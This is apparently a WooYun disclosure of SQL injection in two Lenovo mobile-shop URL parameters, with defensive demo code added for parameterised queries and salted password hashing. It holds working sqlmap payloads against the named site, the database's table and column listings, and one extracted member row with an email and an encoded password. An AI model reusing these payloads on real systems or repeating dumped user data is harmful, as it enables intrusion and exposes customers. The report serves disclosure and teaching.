WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles online -------- http://drop.zone.ci/
2013-08-23: Details reported to the vendor, awaiting vendor handling
2013-08-23: Vendor has confirmed; details disclosed to the vendor only
2013-09-02: Details disclosed to core white hats and relevant domain experts
2013-09-12: Details disclosed to regular white hats
2013-09-22: Details disclosed to intern white hats
2013-10-07: Details disclosed to the public
Bored, so I just tagged along with 小胖子 and wandered around~~~
First one:
http://ess.lenovomobile.com/regiStep2.aspx?MbrID=8199
Second one (requires a logged-in session):
http://ess.lenovomobile.com/shopDtl.aspx?GdsID=A0900001586
---
Place: GET
Parameter: MbrID
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: MbrID=8199 AND 5966=CONVERT(INT,(SELECT CHAR(113)+CHAR(109)+CHAR(103)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (5966=5966) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(117)+CHAR(102)+CHAR(114)+CHAR(113)))

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: MbrID=-3869 UNION ALL SELECT CHAR(113)+CHAR(109)+CHAR(103)+CHAR(98)+CHAR(113)+CHAR(81)+CHAR(98)+CHAR(79)+CHAR(84)+CHAR(85)+CHAR(98)+CHAR(89)+CHAR(67)+CHAR(98)+CHAR(114)+CHAR(113)+CHAR(117)+CHAR(102)+CHAR(114)+CHAR(113)--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: MbrID=8199; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: MbrID=8199 WAITFOR DELAY '0:0:5'--
---
[13:32:34] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
Second one:
---
Place: GET
Parameter: GdsID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: GdsID=A0900001586') AND 3859=3859 AND ('Twim'='Twim

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: GdsID=A0900001586') AND 3193=CONVERT(INT,(SELECT CHAR(113)+CHAR(116)+CHAR(100)+CHAR(101)+CHAR(113)+(SELECT (CASE WHEN (3193=3193) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(104)+CHAR(117)+CHAR(105)+CHAR(113))) AND ('MLFY'='MLFY

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: GdsID=A0900001586'); WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: GdsID=A0900001586') WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
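The two payload families above are shaped differently because the two parameters land in different SQL contexts: MbrID is spliced in unquoted as a number, so "8199 AND ..." runs as SQL directly, while GdsID sits inside ('...'), which is why its payloads close the literal with ') and reopen a matching (' at the end. The following is an added example (mine, not the report's and not the Lenovo application's code) that rebuilds both contexts against an in-memory SQLite database and contrasts them with parameterised queries; the SQLite stand-in, the EssGoods table, the column names beyond MbrID/GdsID and the row values are assumptions. The T-SQL-specific error-based (CONVERT) and time-based (WAITFOR DELAY) payloads are not reproduced because SQLite has neither.

```python
import sqlite3

# Added demo, not the Lenovo application's code. SQLite stands in for
# SQL Server; the EssMember/EssGoods layout and row values are constructed.


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE EssMember (MbrID INTEGER, MbrName TEXT);
        CREATE TABLE EssGoods  (GdsID TEXT, Name TEXT);
        INSERT INTO EssMember VALUES (8199, 'demo-member');
        INSERT INTO EssGoods  VALUES ('A0900001586', 'demo-goods');
        """
    )
    return con


def member_vulnerable(con, mbr_id: str) -> list:
    # regiStep2.aspx-style context: numeric parameter spliced in unquoted,
    # so "8199 AND 1=1" becomes part of the WHERE clause as-is.
    sql = "SELECT MbrName FROM EssMember WHERE MbrID=" + mbr_id
    return [row[0] for row in con.execute(sql)]


def goods_vulnerable(con, gds_id: str) -> list:
    # shopDtl.aspx-style context: value inside ('...'), which is why the
    # GdsID payloads close it with ') and reopen with (' at the end.
    sql = "SELECT Name FROM EssGoods WHERE (GdsID='" + gds_id + "')"
    return [row[0] for row in con.execute(sql)]


def member_safe(con, mbr_id: str) -> list:
    # Parameterised: the value is bound by the driver and never parsed as SQL.
    sql = "SELECT MbrName FROM EssMember WHERE MbrID=?"
    return [row[0] for row in con.execute(sql, (mbr_id,))]


def goods_safe(con, gds_id: str) -> list:
    sql = "SELECT Name FROM EssGoods WHERE (GdsID=?)"
    return [row[0] for row in con.execute(sql, (gds_id,))]


# The boolean-based probe from the sqlmap output above, plus a false twin of it.
GDS_TRUE = "A0900001586') AND 3859=3859 AND ('Twim'='Twim"
GDS_FALSE = "A0900001586') AND 3859=3860 AND ('Twim'='Twim"
MBR_TRUE = "8199 AND 1=1"
MBR_FALSE = "8199 AND 1=2"

if __name__ == "__main__":
    con = make_db()
    # Vulnerable: true and false probes return different rows -> blind SQLi.
    print(member_vulnerable(con, MBR_TRUE), member_vulnerable(con, MBR_FALSE))
    print(goods_vulnerable(con, GDS_TRUE), goods_vulnerable(con, GDS_FALSE))
    # Safe: the same strings are just values that match no row.
    print(member_safe(con, MBR_TRUE), goods_safe(con, GDS_TRUE))
```

The difference between the two probes in the vulnerable functions is exactly the signal sqlmap's boolean-based blind technique keys on; with bound parameters the probe strings are compared as data and both return nothing.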
Current database:
Tables:
Database: lmshop
[89 tables]
+--------------------------+
| EssCarDtl                |
| EssCarMst                |
| EssCmpRegiForm           |
| EssFavorites             |
| EssGoods                 |
| EssGoodsColor            |
| EssGoodsPresent          |
| EssGoodsPrice_Log        |
| EssMember                |
| EssOrder                 |
| EssSales                 |
| EssSalesGoods            |
| EssSalesMail             |
| EssVerifyCode            |
| JB_QuickLogin            |
| MailBasSet               |
| MailSet                  |
| MailTemplate             |
| MailToDtl                |
| MailToGrp                |
| MstCode                  |
| MstCsErr                 |
| MstCsLog                 |
| MstCsMenu                |
| MstCsUser                |
| MstMenu                  |
| MstMessage               |
| MstRole                  |
| MstRoleMenu              |
| MstRoleUser              |
| MstUser                  |
| PmtActivities            |
| PmtAttach                |
| PmtAttendance            |
| PmtFee                   |
| PmtGoods                 |
| PmtImg                   |
| PmtImgSize               |
| PmtOrder                 |
| PmtOrderWithDraw         |
| PmtPromoter              |
| PmtQA                    |
| PmtSettle                |
| PmtSettleDtl             |
| PmtSettleOrder           |
| PmtSettleOrderTmp        |
| PmtSettleSim             |
| PmtSettleSimDtl          |
| PmtVerifyCode            |
| RECEIVE                  |
| SEND                     |
| SellBigOrder             |
| SellCustomize            |
| SellJoinEnterprise       |
| SellJoinPerson           |
| ShopCard                 |
| SmsBasSet                |
| SmsClass                 |
| SmsDueSend               |
| SmsDueSendRec            |
| SmsNormalIF              |
| SmsNormalIFCC111021      |
| SmsNormalIfRec           |
| SmsReceive               |
| SmsReceiveType           |
| SmsSend                  |
| SmsSend100601            |
| SmsSend100602            |
| SmsSendRec               |
| SmsSysSet                |
| SmsTempIF                |
| SmsTempIfRec             |
| SmsTemplate              |
| SmsUserRight             |
| SmsWhiteBlackBill        |
| TrnFeedback              |
| TrnNews                  |
| V_EssGoodsPrice          |
| V_GetPayTypeByDistrictID |
| V_OrderGoodsType         |
| V_PmtFee                 |
| V_UserMenu               |
| ZSmsNormalIF100601       |
| ZSmsNormalIF110916       |
| ZSmsNormalIF111018       |
| bakUp_LMmbrid            |
| dtproperties             |
| pangolin_test_table      |
| sms.SmsNormalIFCC        |
+--------------------------+
Note the pangolin_test_table entry: Pangolin is an automated SQL injection tool, and a table of that name in the target database suggests the instance had already been probed (with write access) by someone running it before this report.
What columns does the user table have?
Database: lmshop
Table: EssMember
[12 columns]
+-----------+----------+
| Column    | Type     |
+-----------+----------+
| Email     | varchar  |
| IsValid   | nvarchar |
| MbrID     | bigint   |
| MbrName   | varchar  |
| Password  | nvarchar |
| Phone     | nvarchar |
| RegDate   | datetime |
| RegID     | nvarchar |
| SalesCode | varchar  |
| SalesID   | bigint   |
| UpdDate   | datetime |
| UpdID     | nvarchar |
+-----------+----------+
Let's see how many rows there are:
Database: lmshop
+---------------+---------+
| Table         | Entries |
+---------------+---------+
| dbo.EssMember | 8198    |
+---------------+---------+
Then I pulled one row of user data, and it's base64, would you believe it!!! How is that any different from plaintext!!!
[13:53:00] [INFO] retrieved: [email protected]
[13:53:00] [INFO] retrieved:
[13:53:01] [INFO] retrieved:
[13:53:01] [INFO] retrieved:
[13:53:02] [INFO] retrieved: 1
[13:53:02] [INFO] retrieved: lihe
[13:53:02] [INFO] retrieved: 05 20 2009 11:27AM
[13:53:03] [INFO] retrieved: 1
[13:53:03] [INFO] retrieved: 05 20 2009 11:27AM
[13:53:04] [INFO] retrieved: FE24W1UJNg1QedCl+4dKFw==
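Decoding that value is the check a practitioner would run before calling it plaintext. The following is an added example (mine, not the report's and not Lenovo's code): it base64-decodes the Password value from the log above, reports whether the result is readable text, and then shows the storage scheme that should have been used instead, a per-user random salt with PBKDF2-HMAC-SHA256 (the iteration count and the "hunter2" sample are assumptions). The sampled value decodes to 16 non-printable bytes, i.e. base64 of a 128-bit binary value rather than of the password text; whether that value is an unsalted digest or an encrypted password cannot be settled from the page, but either way base64 adds no protection, since anyone who can read the column can reverse it.

```python
import base64
import hashlib
import hmac
import os

# Password column value from the sqlmap log above.
STORED = "FE24W1UJNg1QedCl+4dKFw=="


def decode_stored(value: str) -> bytes:
    """Base64 is an encoding, not a cipher or a hash: anyone can reverse it."""
    return base64.b64decode(value, validate=True)


def is_printable_text(raw: bytes) -> bool:
    """True when every decoded byte is printable ASCII (base64 of a plaintext)."""
    return all(0x20 <= b < 0x7F for b in raw)


def classify(value: str) -> str:
    """Say what kind of thing the stored column actually holds."""
    raw = decode_stored(value)
    if is_printable_text(raw):
        return "base64 of plaintext"
    return f"base64 of {len(raw)} opaque bytes ({len(raw) * 8}-bit value)"


# Assumed replacement scheme (not what the site used): 16-byte random salt,
# PBKDF2-HMAC-SHA256, stored as base64(salt || digest).
SALT_LEN = 16
ITERATIONS = 200_000


def hash_password(password: str, salt: bytes = None) -> str:
    salt = salt if salt is not None else os.urandom(SALT_LEN)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return base64.b64encode(salt + digest).decode("ascii")


def verify_password(password: str, stored: str) -> bool:
    raw = base64.b64decode(stored)
    salt, digest = raw[:SALT_LEN], raw[SALT_LEN:]
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    # Constant-time comparison so verification timing leaks nothing.
    return hmac.compare_digest(candidate, digest)


if __name__ == "__main__":
    print(classify(STORED))
    # Constructed sample: "hunter2" base64-encoded, to show the plaintext case.
    print(classify("aHVudGVyMg=="))
    record = hash_password("hunter2")
    print(verify_password("hunter2", record), verify_password("wrong", record))
```

With a salted, iterated hash the column can leak through the injection above and an attacker still has to brute-force each row separately; with base64, or an unsalted 128-bit digest, one dump is enough.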
Do some filtering or whatever.
Severity: High
Vulnerability Rank: 20
Confirmed at: 2013-08-23 16:30
Thanks to VIP for the contribution to Lenovo security! We will immediately assess and fix the related vulnerabilities.
None yet.